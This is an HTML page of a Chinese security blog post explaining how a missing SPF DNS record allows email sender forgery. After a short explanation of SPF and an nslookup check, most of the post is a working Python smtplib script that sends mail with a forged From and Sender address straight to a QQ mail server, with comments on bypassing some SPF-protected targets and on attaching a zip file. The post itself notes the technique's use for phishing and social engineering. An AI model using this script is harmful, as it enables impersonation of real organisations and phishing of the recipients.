<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.1.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.1.1/css/all.min.css" integrity="sha256-DfWjNxDkM94fVBWx1H5BMMp0Zq7luBlV8QRcSES7s+0=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"liaorj.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.11.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="未设置spf导致的邮箱任意伪造spf的解释:SPF 记录是一种域名服务（DNS）记录，用于标识哪些邮件服务器可以代表您的域名发送电子邮件。SPF 记录的目的是为了防止垃圾邮件发送者在您的域名上，使用伪造的发件人地址发送邮件。 原理:未设置spf导致的邮件任意伪造,可以用来钓鱼社工,本身就是高危 若您未对您的域名添加 SPF 解析记录，则黑客可以仿冒以该域名为后缀的邮箱，来发送垃圾邮件。 其实它的危">
<meta property="og:type" content="article">
<meta property="og:title" content="未设置spf导致的邮箱任意伪造">
<meta property="og:url" content="https://liaorj.github.io/2022/09/15/%E6%9C%AA%E8%AE%BE%E7%BD%AEspf%E5%AF%BC%E8%87%B4%E7%9A%84%E9%82%AE%E7%AE%B1%E4%BB%BB%E6%84%8F%E4%BC%AA%E9%80%A0/index.html">
<meta property="og:site_name" content="LiAoRJ的成长记录">
<meta property="og:description" content="未设置spf导致的邮箱任意伪造spf的解释:SPF 记录是一种域名服务（DNS）记录，用于标识哪些邮件服务器可以代表您的域名发送电子邮件。SPF 记录的目的是为了防止垃圾邮件发送者在您的域名上，使用伪造的发件人地址发送邮件。 原理:未设置spf导致的邮件任意伪造,可以用来钓鱼社工,本身就是高危 若您未对您的域名添加 SPF 解析记录，则黑客可以仿冒以该域名为后缀的邮箱，来发送垃圾邮件。 其实它的危">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-09-15T10:17:40.000Z">
<meta property="article:modified_time" content="2022-10-08T03:22:47.196Z">
<meta property="article:author" content="LiAoRJ">
<meta property="article:tag" content="漏洞研究">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="https://liaorj.github.io/2022/09/15/%E6%9C%AA%E8%AE%BE%E7%BD%AEspf%E5%AF%BC%E8%87%B4%E7%9A%84%E9%82%AE%E7%AE%B1%E4%BB%BB%E6%84%8F%E4%BC%AA%E9%80%A0/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://liaorj.github.io/2022/09/15/%E6%9C%AA%E8%AE%BE%E7%BD%AEspf%E5%AF%BC%E8%87%B4%E7%9A%84%E9%82%AE%E7%AE%B1%E4%BB%BB%E6%84%8F%E4%BC%AA%E9%80%A0/","path":"2022/09/15/未设置spf导致的邮箱任意伪造/","title":"未设置spf导致的邮箱任意伪造"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>未设置spf导致的邮箱任意伪造 | LiAoRJ的成长记录</title>
  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">LiAoRJ的成长记录</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">记录一下吧</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">8</span></a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">29</span></a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%9C%AA%E8%AE%BE%E7%BD%AEspf%E5%AF%BC%E8%87%B4%E7%9A%84%E9%82%AE%E7%AE%B1%E4%BB%BB%E6%84%8F%E4%BC%AA%E9%80%A0"><span class="nav-text">未设置spf导致的邮箱任意伪造</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#spf%E7%9A%84%E8%A7%A3%E9%87%8A"><span class="nav-text">spf的解释:</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-text">漏洞利用:</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="LiAoRJ"
      src="/images/touxiang.jpg">
  <p class="site-author-name" itemprop="name">LiAoRJ</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">29</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/LiAoRJ" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;LiAoRJ" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://liaorj.github.io/2022/09/15/%E6%9C%AA%E8%AE%BE%E7%BD%AEspf%E5%AF%BC%E8%87%B4%E7%9A%84%E9%82%AE%E7%AE%B1%E4%BB%BB%E6%84%8F%E4%BC%AA%E9%80%A0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/touxiang.jpg">
      <meta itemprop="name" content="LiAoRJ">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="LiAoRJ的成长记录">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="未设置spf导致的邮箱任意伪造 | LiAoRJ的成长记录">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          未设置spf导致的邮箱任意伪造
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-09-15 18:17:40" itemprop="dateCreated datePublished" datetime="2022-09-15T18:17:40+08:00">2022-09-15</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2022-10-08 11:22:47" itemprop="dateModified" datetime="2022-10-08T11:22:47+08:00">2022-10-08</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/" itemprop="url" rel="index"><span itemprop="name">漏洞研究</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="未设置spf导致的邮箱任意伪造"><a href="#未设置spf导致的邮箱任意伪造" class="headerlink" title="未设置spf导致的邮箱任意伪造"></a>未设置spf导致的邮箱任意伪造</h1><h2 id="spf的解释"><a href="#spf的解释" class="headerlink" title="spf的解释:"></a>spf的解释:</h2><p>SPF 记录是一种域名服务（DNS）记录，用于标识哪些邮件服务器可以代表您的域名发送电子邮件。SPF 记录的目的是为了防止垃圾邮件发送者在您的域名上，使用伪造的发件人地址发送邮件。</p>
<p>原理:未设置spf导致的邮件任意伪造,可以用来钓鱼社工,本身就是高危</p>
<p>若您未对您的域名添加 SPF 解析记录，则黑客可以仿冒以该域名为后缀的邮箱，来发送垃圾邮件。</p>
<p>其实它的危害比它自身邮箱伪造危害更大。</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用:"></a>漏洞利用:</h2><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nslookup -<span class="built_in">type</span>=txt 域名</span><br></pre></td></tr></table></figure>

<p>如果没有v&#x3D;spf1或者没spf就存在邮件伪造漏洞。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> email.mime.multipart</span><br><span class="line"><span class="keyword">import</span> email.mime.text</span><br><span class="line"><span class="keyword">from</span> smtplib <span class="keyword">import</span> SMTP</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">send</span>(<span class="params">fake_email, to, title, content</span>):</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    :param fake_email: 伪造的邮箱</span></span><br><span class="line"><span class="string">    :param to: 发送的邮箱</span></span><br><span class="line"><span class="string">    :param title: 邮件标题</span></span><br><span class="line"><span class="string">    :param content: 邮件内容</span></span><br><span class="line"><span class="string">    :return:</span></span><br><span class="line"><span class="string">    &#x27;&#x27;&#x27;</span></span><br><span class="line">    <span class="comment"># 建立邮件对象</span></span><br><span class="line">    msg = email.mime.multipart.MIMEMultipart()</span><br><span class="line">    <span class="comment"># 添加数据，来自哪，去哪</span></span><br><span class="line">    msg[<span class="string">&#x27;Subject&#x27;</span>] = title</span><br><span class="line">    <span class="comment"># 邮件显示的发送人</span></span><br><span class="line">    <span class="comment"># msg[&#x27;From&#x27;] = &#x27;admin@pingan.com.cn&#x27;</span></span><br><span class="line">    <span class="comment"># 上面一行有时候无法对有spf的目标进行伪造，如果被退信</span></span><br><span class="line">    <span class="comment"># 可以使用header头，在owa下可以对设置了spf的目标邮件源伪造</span></span><br><span class="line">    msg[<span class="string">&#x27;from&#x27;</span>] = fake_email</span><br><span class="line">    msg[<span class="string">&quot;Sender&quot;</span>] = fake_email</span><br><span class="line">    <span class="comment"># msg.add_header(&quot;FROM&quot;, fake_email)</span></span><br><span class="line"></span><br><span class="line">    msg[<span class="string">&#x27;To&#x27;</span>] = to</span><br><span class="line">    txt = email.mime.text.MIMEText(content, <span class="string">&#x27;html&#x27;</span>, <span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">    msg.attach(txt)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 发送附件</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># attpart = MIMEApplication(open(&#x27;notepad.zip&#x27;, &#x27;rb&#x27;).read())</span></span><br><span class="line">    <span class="comment"># attpart.add_header(&#x27;Content-Disposition&#x27;, &#x27;attachment&#x27;, filename=&#x27;a.zip&#x27;)</span></span><br><span class="line">    <span class="comment"># msg.attach(attpart)</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        smtp = SMTP(<span class="string">&quot;mx1.qq.com&quot;</span>, <span class="number">25</span>)</span><br><span class="line">        <span class="comment"># set_debuglevel()是用来调试的。参数值为1表示开启调试模式，参数值为0关闭调试模式</span></span><br><span class="line">        smtp.set_debuglevel(<span class="number">1</span>)</span><br><span class="line">        smtp.ehlo(<span class="string">&quot;test.com&quot;</span>)</span><br><span class="line">        smtp.sendmail(fake_email, [to], msg.as_string())</span><br><span class="line">        <span class="comment"># 退出</span></span><br><span class="line">        smtp.quit()</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;邮件发送成功 email has send out !&#x27;</span>)</span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;err&quot;</span>, e)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">send(<span class="string">&quot;admin@faceid.com&quot;</span>, <span class="string">&quot;s7safe@163.com&quot;</span>, <span class="string">&quot;这是测试的标题&quot;</span>, <span class="string">&quot;看到我就伪造成功了&quot;</span>)</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/" rel="tag"># 漏洞研究</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/09/15/DNS%E5%9F%9F%E4%BC%A0%E9%80%81%E6%BC%8F%E6%B4%9E/" rel="prev" title="DNS域传送漏洞">
                  <i class="fa fa-chevron-left"></i> DNS域传送漏洞
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/09/19/PbootCMS-V1-2-1%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="next" title="PbootCMS V1.2.1代码审计">
                  PbootCMS V1.2.1代码审计 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">LiAoRJ</span>
</div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  





  





</body>
</html>
